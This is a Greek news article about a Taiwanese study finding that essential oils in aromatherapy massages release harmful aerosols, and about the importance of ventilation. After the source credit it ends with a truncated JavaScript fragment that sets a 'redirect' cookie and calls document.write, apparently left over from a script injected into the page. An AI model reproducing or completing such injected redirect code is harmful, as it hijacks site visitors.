Επικίνδυνη η αρωματοθεραπεία;

Επικίνδυνες ουσίες στον ατμοσφαιρικό αέρα απελευθερώνουν τα αιθέρια έλαια σύμφωνα με τους επιστήμονες, γεγονός που ενισχύει τη σημασία του σωστού αερισμού κλειστών χώρων.

Λονδίνο

Περισσότερους κινδύνους παρά οφέλη ενδεχομένως να κρύβουν τα αιθέρια έλαια για την υγεία μας, υποστηρίζει νέα μελέτη από την Ταϊβάν.
Οι ειδικοί του Πανεπιστημίου Φαρμακολογίας και Επιστημών Τσία-Ναν, διαπίστωσαν ότι τα αιθέρια έλαια – που χρησιμοποιούνται ως αρωματικά για εσωτερικούς χώρους ή σε χαλαρωτικά μπάνια και μασάζ – αλληλεπιδρούν με τον  ατμοσφαιρικό αέρα παράγοντας επιβλαβή μικροσωματίδια, τα οποία ευθύνονται για αλλεργικές αντιδράσεις, πονοκεφάλους, ναυτία ή ακόμη και βλάβες στο ήπαρ και τους νεφρούς.

Τα χαλαρωτικά μασάζ στο μικροσκόπιο

Εξετάζοντας την απελευθέρωση των επικίνδυνων για την υγεία πτητικών οργανικών αερολυμάτων κατά τη χρήση αιθέριων ελαίων, οι ερευνητές παρατήρησαν ότι κατά τη διάρκεια μασάζ αρωματοθεραπείας η συγκέντρωσή τους εκτοξευόταν 10 φορές υψηλότερα από ότι συνέβαινε κατά τη διάρκεια άλλων δραστηριοτήτων.

Συγκεκριμένα, οι ειδικοί μέτρησαν τη συγκέντρωση δευτερευόντων οργανικών αερολυμάτων που απελευθερώνονται κατά την τριβή των αιθέριων ελαίων στο δέρμα σε μασάζ που πραγματοποιούνταν σε δύο σπα στην Ταϊβάν.

«Οι πτητικές οργανικές ενώσεις που απελευθερώνουν τα αιθέρια έλαια αλληλεπιδρούν με το όζον που υπάρχει στην ατμόσφαιρα, παράγοντας μικροσκοπικά σωματίδια που ονομάζονται δευτερεύοντα οργανικά αερολύματα. Αυτά μπορούν να προκαλέσουν ερεθισμούς σε μάτια και αναπνευστική οδό» αναφέρουν οι ειδικοί.

Αρκετά υψηλά επίπεδα επιβλαβών μικροσωματιδίων εντόπισαν επίσης και κατά τη διάρκεια καύσης των αιθέριων ελαίων σε εσωτερικούς χώρους όπως στο σπίτι ή στο γραφείο. Αυτά ωστόσο δεν κρίθηκαν το ίδιο ανησυχητικά με εκείνα που παρατηρήθηκαν κατά το μασάζ αρωματοθεραπείας στα σπα.

Τεράστια η σημασία του εξαερισμού

Τα αιθέρια έλαια πιστεύεται ότι προσφέρουν αρκετά ευεργετικά οφέλη, ανάμεσα στα οποία συγκαταλέγονται η βελτίωση του δέρματος, η τόνωση του ανοσοποιητικού συστήματος και η καταπολέμηση της αϋπνίας.

«Από τη στιγμή που η αρωματοθεραπεία χρησιμοποιείται από το ευρύ κοινό και από αρκετά ινστιτούτα αισθητικής και αποτελεί μια από τις πλέον διαδεδομένες συμπληρωματικές θεραπείες, οι επιπτώσεις της στην ποιότητα του εσωτερικού ατμοσφαιρικού αέρα και στην υγεία δεν θα πρέπει να παραβλεφθούν» υπογραμμίζουν οι ερευνητές με σχετική τους δημοσίευση στο επιστημονικό έντυπο  «Environmental Engineering Science».

Για τον λόγο αυτόν, τονίζουν, το σύστημα εξαερισμού ενός σπα παίζει καθοριστικό ρόλο στα επίπεδα των επιβλαβών ουσιών που συγκεντρώνονται στον χώρο κατά την διάρκεια μασάζ αρωματοθεραπείας.

Πηγή : tovima.gr
()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply